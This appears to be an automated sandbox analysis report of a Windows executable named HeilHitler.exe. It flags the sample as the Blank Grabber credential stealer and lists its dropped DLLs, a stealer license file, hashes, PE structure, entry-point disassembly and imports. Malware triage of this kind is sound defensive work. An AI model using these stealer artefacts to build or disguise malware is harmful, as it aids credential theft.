Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
Process:C:\Users\user\Desktop\HeilHitler.exe
File Type:ASCII text
Category:dropped
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:4531984CAD7DACF24C086830068C4ABE
SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key, Author: Joe Security
Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):24952
                                                                                                                                                                                                                                          Entropy (8bit):7.392326214954849
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:+m71gl6dfHKsh8Za7gJXpDCI77G26IIYiSy1pCQ0AA7Pxh8E9VF0Nym5ty:11gl65HKNp5DCI77G2WYiSyv87PxWEgC
                                                                                                                                                                                                                                          MD5:666358E0D7752530FC4E074ED7E10E62
                                                                                                                                                                                                                                          SHA1:B9C6215821F5122C5176CE3CF6658C28C22D46BA
                                                                                                                                                                                                                                          SHA-256:6615C62FA010BFBA5527F5DA8AF97313A1AF986F8564277222A72A1731248841
                                                                                                                                                                                                                                          SHA-512:1D3D35C095892562DDD2868FBD08473E48B3BB0CB64EF9CCC5550A06C88DDA0D82383A1316B6C5584A49CA28ED1EF1E5CA94EC699A423A001CCD952BD6BD553D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].t.<r'.<r'.<r'.D.'.<r'.@s&.<r'.@w&.<r'.@v&.<r'.@q&.<r'i@s&.<r'.<s'.<r'.Ns&.<r'i@.&.<r'i@r&.<r'i@.'.<r'i@p&.<r'Rich.<r'........PE..d...&..c.........." ...".0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):623480
                                                                                                                                                                                                                                          Entropy (8bit):7.993502110233887
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:12288:IZNIrMyJHzTarSwdWd5Xhm/27cz5hQYuHDiL1IcUq4P8ryHn5+8ybL:YNPsHzTaWwdS5xV70QYMDiCc34e8nI82
                                                                                                                                                                                                                                          MD5:BD2819965B59F015EC4233BE2C06F0C1
                                                                                                                                                                                                                                          SHA1:CFF965068F1659D77BE6F4942CA1ADA3575CA6E2
                                                                                                                                                                                                                                          SHA-256:AB072D20CEE82AE925DAE78FD41CAE7CD6257D14FD867996382A69592091D8EC
                                                                                                                                                                                                                                          SHA-512:F7758BD71D2AD236BF3220DB0AD26F3866D9977EAB311A5912F6E079B59FA918735C852DE6DBF7B5FEE9E04124BC0CD438C4C71EDC0C04309330108BA0085D59
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......CG;..&U..&U..&U..^..&U.HZT..&U.HZP..&U.HZQ..&U.HZV..&U..TT..&U..&T..&U..Z]..&U..ZU..&U..Z...&U..ZW..&U.Rich.&U.................PE..d...X..c.........." ...".0...0............................................................`.............................................d"..................................x...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc....0...........,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):294784
                                                                                                                                                                                                                                          Entropy (8bit):7.987175768019268
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:PudZUEjoXwDrGv4qJBd4R0u3FIp6O4LMHS+OsfW/+vzoFZ:EGEjyirGd+f3FIp7eMHS+CUUr
                                                                                                                                                                                                                                          MD5:7A462A10AA1495CEF8BFCA406FB3637E
                                                                                                                                                                                                                                          SHA1:6DCBD46198B89EF3007C76DEB42AB10BA4C4CF40
                                                                                                                                                                                                                                          SHA-256:459BCA991FCB88082D49D22CC6EBFFE37381A5BD3EFCC77C5A52F7A4BB3184C0
                                                                                                                                                                                                                                          SHA-512:D2B7C6997B4BD390257880A6F3336E88D1DD7159049811F8D7C54E3623E9B033E18E8922422869C81DE72FC8C10890C173D8A958D192DD03BFC57CFFAEA1AC7B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t..t..t..}...r..;...v..;...y..;...|..;...w.....w......v..t..%.....u.....u...y.u.....u..Richt..........PE..d...(..c.........." ...".P..........@V... ................................................`..........................................{..X....y.......p..........<............{......................................@b..@...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):97
Entropy (8bit):4.331807756485642
Encrypted:false
SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:195D02DA13D597A52F848A9B28D871F6
SHA1:D048766A802C61655B9689E953103236EACCB1C7
SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:false
Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):7.989688354126539
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:HeilHitler.exe
File size:6'251'402 bytes
MD5:aeab677edfb0b7838ad440c071a04965
SHA1:9855bbfe1e4d729853c1d3fd5e51a6d767cf8203
SHA256:e465cccde051595262dc76359e4a06279341b4292901a49061cf9fa1386119df
SHA512:567dd7cd29f4c35e0d99470628535fddb6f801ce36708003d9a6cc95a0933b613e221c07347040746e4ee174322c02b8da4c59828b79a963ff69c9378a735849
SSDEEP:98304:0bEtdFBg0amaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R0BMnM3JfFTW:0SFceN/FJMIDJf0gsAGK4R0un+TW
TLSH:5F5633B023A448E2EDBB493EC857C89AD5B0B8050754DECF1370826A1F637594E7FB96
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..
                                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                          Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x6726B539 [Sat Nov 2 23:26:49 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                          • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                          • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                          Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                          Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                          Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                          Serial:00BFB15001BBF592D4962A7797EA736FA3
Instruction
dec eax
sub esp, 28h
call 00007F2704E43A0Ch
dec eax
add esp, 28h
jmp 00007F2704E4362Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F2704E43DD8h
test eax, eax
je 00007F2704E437D3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F2704E437B7h
dec eax
cmp ecx, eax
je 00007F2704E437C6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007F2704E437A0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F2704E437A9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F2704E437B9h
mov byte ptr [00035765h], 00000001h
call 00007F2704E42F05h
call 00007F2704E441F0h
test al, al
jne 00007F2704E437B6h
xor al, al
jmp 00007F2704E437C6h
call 00007F2704E50D0Fh
test al, al
jne 00007F2704E437BBh
xor ecx, ecx
call 00007F2704E44200h
jmp 00007F2704E4379Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007F2704E43819h
cmp ecx, 01h
jnbe 00007F2704E4381Ch
call 00007F2704E43D4Eh
test eax, eax
je 00007F2704E437DAh
test ebx, ebx
jne 00007F2704E437D6h
dec eax
lea ecx, dword ptr [00035716h]
call 00007F2704E50B02h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca5c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x944 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2250 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x5f3f42 | 0x2448 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0x764 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f00 | 0x2a000 | a6c3b829cc8eaabb1a474c227e90407f | False | 0.5514206659226191 | data | 6.487493643901088 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a50 | 0x12c00 | 9401ac65aa27d3b825eaa9a5193c2635 | False | 0.5245182291666667 | data | 5.752829645270396 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2250 | 0x2400 | 181312260a85d10a1454ba38901c499b | False | 0.4705946180555556 | data | 5.290347578351011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x944 | 0xa00 | e8658713401cf79474dadd6bd294884f | False | 0.43046875 | data | 5.116289783193498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x48000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x470a0 | 0x394 | OpenPGP Secret Key | | | 0.4650655021834061
RT_MANIFEST | 0x47434 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
